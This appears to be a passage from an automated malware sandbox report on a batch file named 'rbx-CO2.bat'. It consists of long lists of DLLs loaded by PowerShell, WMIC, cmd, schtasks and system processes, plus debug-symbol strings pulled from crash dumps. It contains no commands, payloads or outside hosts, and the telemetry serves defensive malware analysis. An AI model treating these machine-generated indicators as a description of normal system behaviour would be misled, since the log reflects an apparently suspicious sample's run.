Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: rbx-CO2.bat Static file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbSystem.DirectoryServices.dll source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.pdbp}Y source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.pdb`- source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbP< source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdbh source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdbP source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbP4 source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbMicrosoft.PowerShell.Commands.Utility.dllH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@y' source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.pdb`*?@_*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbH source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdbH source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
